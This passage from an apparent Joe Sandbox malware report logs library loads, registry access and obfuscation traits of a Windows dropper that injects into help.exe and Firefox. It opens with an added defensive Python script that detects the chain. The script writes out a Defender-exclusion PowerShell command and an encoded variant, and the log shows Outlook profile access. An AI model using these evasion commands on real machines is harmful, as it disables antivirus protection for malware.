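The process chain recorded above is the part of this report worth matching on in endpoint telemetry: a Desktop executable runs powershell.exe with Add-MpPreference -ExclusionPath on its own path, then starts a second copy of itself, a binary under a randomly named Program Files (x86) directory starts C:\Windows\SysWOW64\help.exe, and help.exe in turn starts firefox.exe. The Python below is an added example and is not part of the Joe Sandbox report: it runs four checks (Defender exclusion cmdlet, self-spawn, Windows utility with a non-Windows parent, browser started by a Windows utility) over constructed process-creation events that mirror that chain. It also decodes the base64 -EncodedCommand form of the same cmdlet, which goes beyond the clear-text command line this report shows; the encoded event, the explorer.exe parent of the first process and the pids are assumptions made for the example.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    """The three fields Sysmon Event ID 1 or Security 4688 (with command-line auditing) supply."""
    pid: int
    image: str
    parent_image: str
    command_line: str


# Add-MpPreference with any exclusion parameter, in clear text.
MPPREF_RE = re.compile(r"Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension|IpAddress)\b",
                       re.I | re.S)
# PowerShell -EncodedCommand (and its short forms) followed by a base64 blob.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe"}
BROWSER_PARENT_ALLOW = {"cmd.exe"}   # hunting heuristic: tune per environment


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE payload behind -EncodedCommand, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_event(ev: ProcEvent) -> List[Tuple[int, str, str]]:
    """(pid, rule, detail) for every rule the event trips."""
    findings = []
    img, par = ev.image.lower(), ev.parent_image.lower()
    text = ev.command_line
    decoded = decode_encoded_command(text)
    if decoded is not None:
        text = decoded                       # judge the decoded script, not the wrapper
    if MPPREF_RE.search(text):
        how = "encoded " if decoded else ""
        findings.append((ev.pid, "defender_exclusion", f"{how}Add-MpPreference: {text.strip()}"))
    if img == par:                           # a process launching a second copy of itself
        findings.append((ev.pid, "self_spawn", f"{_base(img)} launched a copy of itself"))
    if img.startswith(SYSTEM_DIRS) and not par.startswith("c:\\windows\\"):
        findings.append((ev.pid, "system_util_odd_parent",
                         f"{_base(img)} started by {ev.parent_image}"))
    if (_base(img) in BROWSERS and par.startswith(SYSTEM_DIRS)
            and _base(par) not in BROWSER_PARENT_ALLOW):
        findings.append((ev.pid, "browser_from_system_util",
                         f"{_base(img)} started by {_base(par)}"))
    return findings


def scan(events) -> List[Tuple[int, str, str]]:
    return [f for ev in events for f in scan_event(ev)]


# Constructed events mirroring the chain in this report; pids and the explorer.exe
# parent of the first process are assumptions, not sandbox output.
DROPPER = r"C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
ENCODED_PAYLOAD = r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"'
ENCODED_CMDLINE = (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand '
                   + base64.b64encode(ENCODED_PAYLOAD.encode("utf-16-le")).decode("ascii"))
EVENTS = [
    ProcEvent(1, DROPPER, r"C:\Windows\explorer.exe", f'"{DROPPER}"'),
    ProcEvent(2, PS, DROPPER,
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
              r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"'),
    ProcEvent(3, DROPPER, DROPPER, f'"{DROPPER}"'),
    ProcEvent(6, r"C:\Windows\SysWOW64\help.exe",
              r"C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe",
              r'"C:\Windows\SysWOW64\help.exe"'),
    ProcEvent(7, r"C:\Program Files\Mozilla Firefox\firefox.exe", r"C:\Windows\SysWOW64\help.exe",
              r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
    ProcEvent(8, PS, DROPPER, ENCODED_CMDLINE),   # constructed encoded variant of event 2
]

if __name__ == "__main__":
    for pid, rule, detail in scan(EVENTS):
        print(f"pid {pid:<3} {rule:<26} {detail}")
```

The defender_exclusion and self_spawn rules are precise enough to alert on; the two lineage rules are hunting heuristics and will fire on legitimate installers and shortcuts until the allow-lists are tuned. Note that the exclusion cmdlet succeeds only from an elevated PowerShell, so pair the alert with token-elevation data where you have it.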
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: wintypes.dll
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\help.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: mKv3sKQ5Q4E7waF.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: mKv3sKQ5Q4E7waF.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: mKv3sKQ5Q4E7waF.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: zpaD.pdbSHA256 source: mKv3sKQ5Q4E7waF.exe
                Source: Binary string: wntdll.pdbUGP source: mKv3sKQ5Q4E7waF.exe, 00000003.00000002.993274250.0000000001940000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000006.00000003.990067231.0000000000909000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000002.3290844850.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000006.00000003.999586311.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000002.3290844850.0000000002C70000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: mKv3sKQ5Q4E7waF.exe, mKv3sKQ5Q4E7waF.exe, 00000003.00000002.993274250.0000000001940000.00000040.00001000.00020000.00000000.sdmp, help.exe, help.exe, 00000006.00000003.990067231.0000000000909000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000002.3290844850.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000006.00000003.999586311.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000002.3290844850.0000000002C70000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: help.pdbGCTL source: mKv3sKQ5Q4E7waF.exe, 00000003.00000002.990846497.0000000001337000.00000004.00000020.00020000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3289759392.000000000099E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: help.pdb source: mKv3sKQ5Q4E7waF.exe, 00000003.00000002.990846497.0000000001337000.00000004.00000020.00020000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3289759392.000000000099E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: zpaD.pdb source: mKv3sKQ5Q4E7waF.exe
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3290284490.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000000.1066377820.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp

                Data Obfuscation

                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, jYZmvtAx2Fnacyn2Tb.cs | .Net Code: kvOYebFsIo System.Reflection.Assembly.Load(byte[])
                Source: mKv3sKQ5Q4E7waF.exe | Static PE information: 0xC535338B [Sun Nov 4 23:02:35 2074 UTC]
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 0_2_008DEE80 pushfd ; iretd 0_2_008DEE81
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 0_2_08546C22 push 0000005Dh; ret 0_2_08546CED
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_0041E87E push es; retf 3_2_0041E880
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_0041E88A push esi; ret 3_2_0041E88B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_00404956 push CD785CF3h; ret 3_2_00404960
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_004051F5 push ebx; retf 3_2_004051FA
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_004139A3 push esi; ret 3_2_004139AA
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_00405A87 push ecx; retf 3_2_00405A91
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_0041ABDA push esi; ret 3_2_0041ABEA
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_0041ABE3 push esi; ret 3_2_0041ABEA
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_00417C4D push 00000024h; ret 3_2_00417C4F
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_00418C73 push eax; ret 3_2_00418D0A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_004034F0 push eax; ret 3_2_004034F2
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_00417570 push edx; retf 3_2_00417596
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_00418DD0 push es; iretd 3_2_00418DD1
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_004185A9 push A3C436E7h; ret 3_2_004185CB
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_00404EC1 push ecx; iretd 3_2_00404EC6
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_0041074B push 3788F9D1h; ret 3_2_00410752
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_0040D709 push esp; iretd 3_2_0040D70A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_0041971B push ebx; iretd 3_2_00419720
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_00417FCA push ebx; retf 3_2_00417FDD
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_004117D3 push edi; ret 3_2_004117DA
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_0194225F pushad ; ret 3_2_019427F9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_019427FA pushad ; ret 3_2_019427F9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_019709AD push ecx; mov dword ptr [esp], ecx 3_2_019709B6
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_0194283D push eax; iretd 3_2_01942858
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Code function: 3_2_01941368 push eax; iretd 3_2_01941369
                Source: C:\Windows\SysWOW64\help.exe | Code function: 6_2_02C7225F pushad ; ret 6_2_02C727F9
                Source: C:\Windows\SysWOW64\help.exe | Code function: 6_2_02C727FA pushad ; ret 6_2_02C727F9
                Source: C:\Windows\SysWOW64\help.exe | Code function: 6_2_02C7283D push eax; iretd 6_2_02C72858
                Source: C:\Windows\SysWOW64\help.exe | Code function: 6_2_02CA09AD push ecx; mov dword ptr [esp], ecx 6_2_02CA09B6
